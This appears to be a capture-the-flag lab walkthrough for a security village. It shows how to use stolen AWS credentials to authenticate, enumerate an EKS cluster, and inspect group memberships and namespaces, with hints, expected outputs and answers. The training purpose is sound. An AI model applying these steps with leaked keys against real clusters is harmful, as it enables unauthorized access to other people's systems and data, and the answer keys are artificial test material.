Kubernetes Initial Access

Microsoft's Threat Matrix for Kubernetes highlights a number of Initial Access techniques used by attackers to compromise a cluster. One of the techniques, documented as Using cloud credentials, occurs when cloud credentials are stolen or unintentionally leaked.

AWS CLI Configuration

The AWS Command Line Interface (CLI) provides programmatic access to the AWS service APIs. To gain access to the AWS Elastic Kubernetes Cluster (EKS), you need to configure the AWS CLI to use the stolen credentials that you received from the village hosts. Set the required AWS CLI environment variables to use the stolen credentials. What is the name of the compromised AWS principal?

Hint

• The AWS CLI checks several locations for credentials when authenticating to the AWS APIs. This includes a local configuration file (~/.aws/credentials), environment variables, and the instance metadata service when running inside an AWS process (EC2, Lambda, etc.). Set the AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, and AWS_DEFAULT_REGION environment variables to the stolen credentials.

  export AWS_ACCESS_KEY_ID=STOLEN_ACCESS_KEY
  export AWS_SECRET_ACCESS_KEY=STOLEN_SECRET_KEY
  export AWS_DEFAULT_REGION=STOLEN_REGION
  

• The AWS Security Token Service (STS) has a GetCallerIdentity that returns details about the IAM user or role calling the API. Use the aws sts get-caller-identity command to retrieve the compromised principal's name and AWS account id.

  aws sts get-caller-identity
  

  Expected Output

  {
    "UserId": "AIDA2ZCFBDI7W52ZHQYQ7",
    "Account": "123456789012",
    "Arn": "arn:aws:iam::123456789012:user/?????"
  }
  

Answer

• The compromised principal's name is in the Arn field in the output, which identifies an IAM user named kubeace-maverick followed by a random identifier.

  kubeace-maverick-randomid
  

AWS EKS Initial Access

Amazon's Elastic Kubernetes Service (EKS) is a managed Kubernetes service that makes it simple to run Kubernetes on AWS without needing to install, configure, and maintain your own Kubernetes control plane. EKS is integrated with many AWS services, including the Identity and Access Management (IAM) service.

With the appropriate EKS access entry and permissions, AWS principals can configure kubectl to authenticate directly to the EKS cluster.

1. Use the AWS CLI to search the AWS account for EKS clusters. What is the name of the EKS cluster that you need to access?

   Hint

   • The aws eks list-clusters command lists the EKS clusters in the specified AWS account.

     aws eks list-clusters
     

     Expected Output

     {
       "clusters": [
         "?????"
       ]
     }
     

   Answer

   • The EKS cluster you need to access is named hth-eks-cluster.

     hth-eks-cluster
     

2. Use AWS CLI to update your machine's kubeconfig file and access the EKS cluster. What Kubernetes group(s) is the compromised AWS principal a member of?

   Hint

   • The aws eks update-kubeconfig command updates the ~/.kube/config file with details kubectl needs to authenticate to the hth-eks-cluster cluster.

     aws eks update-kubeconfig --name hth-eks-cluster
     

     Expected Output

     Updated context arn:aws:eks:us-west-2:123456789012:cluster/hth-eks-cluster in /Users/user/.kube/config
     

   • Similar to the aws sts get-caller-identity command, kubectl has its own command that returns details about the authenticated user. Use the kubectl auth whoami command to view the compromised principal's group memberships.

     kubectl auth whoami
     

     Expected Output

     ATTRIBUTE                                              VALUE
     Username                                               kubeace-maverick-randomid
     UID                                                    aws-iam-authenticator:123456789012:AIDA2ZCFBDI7W52ZHQYQ7
     Groups                                                 [?????]
     Extra: accessKeyId                                     [AKIA2ZCFBDI74CS5EG5L]
     Extra: arn                                             [arn:aws:iam::123456789012:user/kubeace-maverick-randomid]
     Extra: canonicalArn                                    [arn:aws:iam::123456789012:user/kubeace-maverick-randomid]
     Extra: principalId                                     [AIDA2ZCFBDI7W52ZHQYQ7]
     Extra: sessionName                                     []
     Extra: sigs.k8s.io/aws-iam-authenticator/principalId   [AIDA2ZCFBDI7W52ZHQYQ7]
     

   Answer

   • The compromised principal is a member of the hth-data-viewers and system:authenticated groups. Based on the name of the first group (hth-data-viewers), it is likely that the principal has read-only access to data inside the cluster.

     Expected Output

     Groups [hth-data-viewers system:authenticated]
     

3. Use kubectl to list the namespaces in the Kubernetes cluster. Which namespace do you think contains the hth data?

   Hint

   • Run the kubectl get namespaces command to list the namespaces in the EKS cluster.

     kubectl get namespaces
     

     Expected Output

     NAME                STATUS   AGE
     amazon-cloudwatch   Active   5d18h
     calico-system       Active   5d17h
     cert-manager        Active   5d17h
     default             Active   5d18h
     gatekeeper-system   Active   5d17h
     ?????               Active   5d17h
     kube-node-lease     Active   5d18h
     kube-public         Active   5d18h
     kube-system         Active   5d18h
     tigera-operator     Active   5d17h
     

   Answer

   • The hth namespace contains the Kubernetes resources that are viewable by members of the hth-data-viewers group.

     Expected Output

     hth                 Active   5d17h
     

Village Challenges

Now that you have successfully gained access to the EKS cluster using the compromised AWS credentials, it is time to start elevating privileges inside the cluster and exfiltrating HTH data. Navigate to the Airborneio-24 Challenge to find the first flag.